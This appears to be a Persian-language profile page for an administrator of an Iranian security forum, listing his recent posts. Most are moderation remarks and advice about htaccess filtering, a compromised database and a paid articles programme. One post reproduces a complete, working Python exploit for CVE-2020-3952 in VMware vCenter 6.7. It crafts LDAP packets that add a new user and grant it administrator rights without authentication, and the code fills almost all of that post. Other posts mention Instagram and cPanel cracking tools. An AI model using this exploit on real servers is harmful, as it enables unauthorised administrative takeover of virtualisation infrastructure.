رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

root3r

Administrator
  • تعداد ارسال ها

    528
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    6
  • Country

    ایران

آخرین بار برد root3r در آبان 13

root3r یکی از رکورد داران بیشترین تعداد پسند مطالب است !

اعتبار در سایت

12 Good

درباره root3r

  • تاریخ تولد ۹۵/۰۹/۰۸

Converted

  • Name
    حسین
  • Main os
    Kali
  • Programming language
    خیر

آخرین بازدید کنندگان نمایه

بلوک آخرین بازدید کننده ها غیر فعال شده است و به دیگر کاربران نشان داده نمی شود.

  1. سلام در بخش سوال جواب ابزار قرار دادید؟ قوانین رو مطالعه کنید و با توجه به نوع محتوا پست ایجاد کنید با عنوان مناسب و در بخش قابل قبول ابزارهایی که قرار میدهید لینک اسکن همراه با اسکرین و توضیحات کامل از اسم و سازنده ابزار قرار داده در غیر این صورت تمامی پست های قرارداده شده حذف خواهد شد
  2. root3r

    کرک اینستا <کمک>

    داخل فروم سرچ کنید: اسکریپت های دیگر هم قرار داده شده بررسی نمایید ببینید کدوم بدردتون میخوره!
  3. آسیب پذیری از Vmware vCenter : VMware vCenter Server 6.7 - Authentication Bypass چندی پیش آسیب پذیری از Vmware vCenter ورژن 6.7 کشف و اعلام شد . با بهره از این آسیب پذیری امکان دورزدن احراز هویت ( Authentication Bypass ) در Vmware vCenter Server میباشد. دراصطلاح هکر با قادر است یک حساب کاربری با سطح دسترسی Administrator اضافه کند و علت این آسیب پذیری که حساس هم هست دو دلیل داره : 1- خطا و ایراد در سیستم بررسی سطح درسترسی ها و مجوزها 2- خطا در LDAP که امکان و مجوز بدون احرازهویت را میدهد. V 6.7 : # Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass # Date: 2020-06-01 # Exploit Author: Photubias # Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html # Version: vCenter Server 6.7 before update 3f # Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0) # CVE: CVE-2020-3952 #!/usr/bin/env python3 ''' Copyright 2020 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. Based (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952 File name CVE-2020-3592.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be ## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x This is a native implementation without requirements, written in Python 3. Works equally well on Windows as Linux (as MacOS, probably ;-) Features: exploit + vulnerability checker ''' import binascii, socket, sys, string, random ## Default vars; change at will _sIP = '192.168.50.35' _iPORT = 389 _iTIMEOUT = 5 def randomString(iStringLength=8): #sLetters = string.ascii_lowercase sLetters = string.ascii_letters return ''.join(random.choice(sLetters) for i in range(iStringLength)) def getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified ## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed sReturn = sPrefix if (len(sData) / 2 ) > 255: sReturn += b'82' hexBytes = 2 elif (len(sData) /2 ) >= 128: sReturn += b'81' sReturn += f"{int(len(sData)/2):#0{(hexBytes*2)+2}x}"[2:].encode() return sReturn def buildBindRequestPacket(sUser, sPass): sUser = binascii.hexlify(sUser.encode()) sPass = binascii.hexlify(sPass.encode()) ## Packet Construction sPacket = getLengthPrefix(sPass, b'80') + sPass sPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket sPacket = b'020103' + sPacket sPacket = getLengthPrefix(sPacket, b'60') + sPacket sPacket = b'020101' + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def buildUserCreatePacket(sUser, sPass): sUser = binascii.hexlify(sUser.encode()) sPass = binascii.hexlify(sPass.encode()) def createAttribute(sName, sValue): sValue = getLengthPrefix(sValue, b'04') + sValue sName = getLengthPrefix(sName, b'04') + sName sReturn = getLengthPrefix(sValue, b'31') + sValue sReturn = sName + sReturn sReturn = getLengthPrefix(sReturn, b'30') + sReturn return sReturn def createObjectClass(): sReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top') sReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person') sReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson') sReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user') sReturn = getLengthPrefix(sReturn, b'31') + sReturn sReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn sReturn = getLengthPrefix(sReturn, b'30') + sReturn return sReturn ## Attributes sAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True')) sAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL')) sAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser) sAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser) sAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local')) sAttributes += createAttribute(binascii.hexlify(b'cn'), sUser) sAttributes += createAttribute(binascii.hexlify(b'uid'), sUser) sAttributes += createObjectClass() sAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass) ## CN sCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local') sUserEntry = getLengthPrefix(sCN, b'04') + sCN ## Packet Assembly (bottom up) sPacket = getLengthPrefix(sAttributes, b'30') + sAttributes sPacket = sUserEntry + sPacket sPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def buildModifyUserPacket(sUser): sFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode()) sCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local') sMember = binascii.hexlify(b'member') ## Packet Construction sPacket = getLengthPrefix(sFQDN, b'04') + sFQDN sPacket = getLengthPrefix(sPacket, b'31') + sPacket sPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket sPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket sPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket sPacket = getLengthPrefix(sPacket, b'02010366') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def performBind(s): ## Trying to bind, fails, but necessary (even fails when using correct credentials) dPacket = buildBindRequestPacket('[email protected]','www.IC4.be') s.send(dPacket) sResponse = s.recv(1024) try: sResponse = sResponse.split(b'\x04\x00')[0][-1:] sCode = binascii.hexlify(sResponse).decode() if sCode == '31': print('[+] Ok, service reachable, continuing') else: print('[-] Something went wrong') except: pass return sCode def performUserAdd(s, sUser, sPass): dPacket = buildUserCreatePacket(sUser,sPass) s.send(dPacket) sResponse = s.recv(1024) try: sCode = sResponse.split(b'\x04\x00')[0][-1:] sMessage = sResponse.split(b'\x04\x00')[1] if sCode == b'\x00': print('[+] Success! User ' + sUser + '@vsphere.local added with password ' + sPass) elif sCode == b'\x32': print('[-] Error, this host is not vulnerable (insufficientAccessRights)') else: if sMessage[2] == b'81': sMessage = sMessage[3:].decode() else: sMessage = sMessage[2:].decode() print('[-] Error, user not added, message received: ' + sMessage) except: pass return sCode def performUserMod(s, sUser, verbose = True): dPacket = buildModifyUserPacket(sUser) s.send(dPacket) sResponse = s.recv(1024) try: sCode = sResponse.split(b'\x04\x00')[0][-1:] sMessage = sResponse.split(b'\x04\x00')[1] if sCode == b'\x00': if verbose: print('[+] User modification success (if the above is OK).') else: if sMessage[2] == b'81': sMessage = sMessage[3:].decode() else: sMessage = sMessage[2:].decode() if verbose: print('[-] Error during modification, message received: ' + sMessage) except: pass return sCode, sMessage def performUnbind(s): try: s.send(b'\x30\x05\x02\x01\x04\x42\x00') except: pass def main(): global _sIP, _iPORT, _iTIMEOUT _sUSER = 'user_' + randomString(6) _sPASS = randomString(8) + '_2020' bAdduser = False if len(sys.argv) == 1: print('[!] No arguments found: python3 CVE-2020-3592.py <dstIP> [<newUsername>] [<newPassword>]') print(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS) print(' Leave username & password empty for a vulnerability check') print(' Watch out for vCenter/LDAP password requirements, leave empty for random password') print(' But for now, I will ask questions') sAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ') if not sAnswer == '': _sIP = sAnswer sAnswer = input('[?] Want to perform a check only? [Y/n]: ') if sAnswer.lower() == 'n': bAdduser = True if bAdduser: sAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ') if not sAnswer == '': _sUSER = sAnswer sAnswer = input('[?] Please enter the new password for this user [' + _sPASS + ']: ') if not sAnswer == '': _sPASS = sAnswer else: _sIP = sys.argv[1] if len(sys.argv) >= 3: _sUSER = sys.argv[2] bAdduser = True if len(sys.argv) >= 4: _sPASS = sys.argv[3] ## MAIN print('') s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(_iTIMEOUT) try: s.connect((_sIP,_iPORT)) except: print('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable') sys.exit(1) performBind(s) if bAdduser: sCode = performUserAdd(s, _sUSER, _sPASS) if not bAdduser: print('[!] Checking vulnerability') sCode, sMessage = performUserMod(s, 'Administrator', False) if sCode == b'\x32': print('[-] This host is not vulnerable, message: ' + sMessage) else: print('[+] This host is vulnerable!') else: sCode = performUserMod(s, _sUSER) performUnbind(s) s.close() if __name__ == "__main__": main()
  4. root3r

    مکانیزم امنیتی seh

    با عرض احترام تشکر بابت مطالب مفیدتون لطف میکنید تمامی ابزار و کد هایی که بصورت Screen قرار دادید اگر فایل هستند پیوست کنید و یا از تگ کد استفاده کنید؟ و اگر لازم هست بخشی مبنی بر فازینگ و ... در انجمن لحاض گردد بصورت پیام خصوصی در ارتباط باشید.
  5. root3r

    معرفی گروه امنیتی لیان

    با احترام برای بار اول تبلیغ ممنوع هست , در صورت تکرار اخراج خواهید شد.
  6. root3r

    Cpanel Cracker V2

    تشکر از شما , فایل هارو داخل انجمن اپلود کنید.
  7. root3r

    فایل Htdaccess

    محتوا فایل htaccess رو اینجا قرار بدین . بعد وقتی ' میزارین بلاک میشه ! خب مگر قصدتون همین نبود! الان درست داره کار میکنه مشکلتون چیه ؟ ولی در کل اینها به راحتی Bypass میشه
  8. root3r

    فایل Htdaccess

    به دلیل حذف متون سوالات بعد از دریافت پاسخ توسط شما دسترسی ادیت رو برای شما برداشتم . میتونید Block کنید فقط اگر داخل وبسایت ( چه داخل سرچ یا پست ها از کاراکتر ها استفاده بشه ) تداخل داره و در کل استفاده از این روش ها به راحتی قابل Bypass هست !
  9. root3r

    چند سوال مربوط به هک دیتابیس(مهم)

    datalife آسیب پذیری Sql Injection زیاد داره هم Private هم Public . متوجه منظورتون نشدم که سایت داخل هاست و دیتابیس تغییری نکرده و حذف نشده ولی دیتابیس داخل سرور مجازی دلیت شده؟ متوجه منظورتون نمیشم ولی اگر منظورتون اینه که فایل بک آپ و یا فایلی داخل سرور مجازی حذف شده ربطی به Mysql نداره .
  10. root3r

    فایل Htdaccess

    ابتدا اینکه سوالاتون رو داخل بخش سوال و جواب مطرح کنید و قوانین انجمن را مطالعه و رعایت فرمایید. میخواید تک کوتیشن داخل url قرار دادن کاربر Block یا ریدایرکت بشه؟
  11. root3r

    چند سوال مربوط به هک دیتابیس(مهم)

    با احترام لطفا مشخصات بیشتری از میزبانی که مورد نفوذ قرار گرفته قرار دهید تا راهنماییتون کنم . نوع وبسرور- ورژن ها و نرم افزارهای مورد استفاده قرار گرفته رو اعلام کنید اگر دیتابیستون مورد نفوذ قرار گرفته الزاما فقط از سمت خود Mysql نیست ! ممکنه اطلاعات دیتابیس از جای دیگری مورد سرقت قرار گرفته باشه ( سرور میزبان - آسیب پذیری نرم افزار و ... ) بخاطر همین گفتم اطلاعات تکمیلی بدین از نوع میزبان و کاربرد آن تا بهتر راهنمایی کنم.
  12. root3r

    هک اسکریپت ما + جایزه

    برای ارزیابی امنیت و انجام تست نفوذ بصورت رسمی و اصولی با بنده در ارتباط باشین درضمن هزینه ارزیابی امنیت خیلی بیشتر از این مبالغ هست و کسی برای 200 هزارتومن ارزش کار خودش رو پایین نمیاره !
  13. بله برنامه های زیادی در نظر داریم برای مقالات که هم برای انجمن مفید هست هم کاربر و رزومه ای هم میشه برای کسانی که مقاله ارسال میکنند . از این پس بیشتر به انجمن سر میزنم , دوستان میتوانید مقاله خودتون رو پیام خصوصی کنید. دوستانی هم که در مورد Sim jack مقاله دارند ارسال کنند. مقاله ای در این باره قصد تکمیل و ارائه در انجمن رو دارم
  14. root3r

    اموزش کار با Nmap

    https://iran-cyber.net/forums/threads/%D8%AC%D8%A7%D9%85%D8%B9-%D8%AA%D8%B1%DB%8C%D9%86-%D8%A2%D9%85%D9%88%D8%B2%D8%B4-cloudflare-dns-protection-bypass.2136/ از وبسایت هایی که record DNS هارو کش میکنند هم میتوانید استفاده کنید , ممکنه قبل از ست شدن بر روی DNS های Cloudflare بر روی DNS ها اصلی خود ست بوده باشد.
  15. با عرض احترام خدمت مدیران و کاربران ، جهت افزایش بار علمی وبسایت و انجمن و همچنین کسب درامد برای کاربران و مدیران فروم تصمیم بر آن شد طرحی پیاده سازی شود جهت راه اندازی بخش تحقیقات که با توسعه بار علمی که منجر به افزایش سطح علمی انجمن و کاربران میشود و در جهت کسب درامد برای مدیران و کاربران هم تاثیر گذار خواهد بود. در این طرح که هدف اصلی افزایش سطح علمی و کسب درامد هست ، همراهان شرکت امنیتی ایران سایبر میتوانند با فعالیت در بخش تحقیقات وبسایت و دریافت عضویت مربوطه در بخش تیم تحقیقات ، مقالات اختصاصی خود را ( مقالات اختصاصی ) که این مقالات میتواند : مقالات علمی در زمینه برنامه نویسی ، هک و امنیت ، شبکه ، بدافزار ها و ... مقالات مربوط به تکنولوژی های مختلف مقالات و اخرین اخبار مربوط به حوزه فناوری اطلاعات و موارد مربوطه اخبار بروز دنیای هک ، امنیت و ... برای ما ارسال کرده پس از تایید مقاله هزینه آن با روش های مختلف به حساب نویسنده واریز میشود. قوانین: مقالات کپی و سرقت علمی مورد تایید نخواهد بود مطالب و مقالات ارسالی باید فقط و فقط در اختیار این شرکت قرار گیرد مطالب و مقالات ارسالی توسط کاربران به نام همان کاربر ( شخص نویسنده اصلی ) انتشار و در اختیار کاربران قرار خواهد گرفت. در صورت انتشار مقالات به چندین شرکت و منبع ، شرکت امنیتی ایران سایبر حق برخورد و رسیدگی به این موضوع را حق خود دانسته و آن را پیگیری خواهد نمود. درصورت وجود هرگونه سوال و ابهام میتوانید در ادامه همین تاپیک آن را مطرح نمایید.

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...